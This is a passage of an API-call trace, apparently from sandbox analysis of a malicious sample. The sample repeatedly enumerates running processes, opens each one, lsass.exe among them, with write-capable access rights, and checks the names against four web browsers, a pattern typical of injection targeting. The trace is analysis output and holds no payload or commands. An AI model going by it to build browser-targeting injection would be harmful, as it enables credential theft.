	[0249.221] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0249.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9e68
	[0249.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.221] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0249.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.222] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.222] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0249.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.222] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.223] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9e6c
	[0249.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.224] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.224] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.224] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.225] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.225] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.225] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9e70
	[0249.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.227] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.227] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.227] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.228] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.228] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.229] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9e74
	[0249.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.229] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.229] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.229] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.230] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.230] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0249.231] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9e78
	[0249.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.231] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0249.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.231] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.231] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0249.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.232] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.232] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9e7c
	[0249.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.233] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.233] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.234] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.234] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.234] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9e80
	[0249.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.235] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.235] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.236] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.236] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.236] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0249.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9e84
	[0249.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.237] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0249.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.238] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.238] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0249.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.238] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.238] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0249.239] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9e88
	[0249.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.239] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.240] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.240] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.240] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.241] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0249.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9e8c
	[0249.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.242] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0249.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.243] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.243] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0249.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.243] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9e90
	[0249.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.244] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.244] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.245] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.245] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.245] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0249.246] CloseHandle (hObject=0x4fd0) returned 1
	[0249.246] Sleep (dwMilliseconds=0x64) 
	[0249.453] GetCurrentProcessId () returned 0x110
	[0249.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0249.456] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0249.457] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0249.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0249.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9e94
	[0249.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.459] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0249.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.459] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.459] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0249.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.459] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0249.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9e98
	[0249.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.461] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0249.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.461] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.461] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0249.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.462] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0249.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9e9c
	[0249.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.463] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0249.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.463] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.463] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0249.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.464] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0249.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9ea0
	[0249.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.465] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0249.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.465] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.466] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0249.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.466] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.466] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0249.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9ea4
	[0249.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.467] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0249.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.467] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.468] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0249.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.468] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0249.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9ea8
	[0249.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.469] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0249.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.469] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.470] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0249.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.470] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.470] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0249.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9eac
	[0249.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.471] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0249.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.471] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.472] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0249.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.472] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0249.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9eb0
	[0249.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.473] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0249.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.473] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.474] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0249.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.474] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.474] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9eb4
	[0249.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.475] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.475] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.476] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.476] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.476] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9eb8
	[0249.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.477] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.478] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.478] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.478] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9ebc
	[0249.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.479] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.480] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.480] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.480] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9ec0
	[0249.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.482] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.482] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.482] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.483] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.483] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9ec4
	[0249.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.484] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
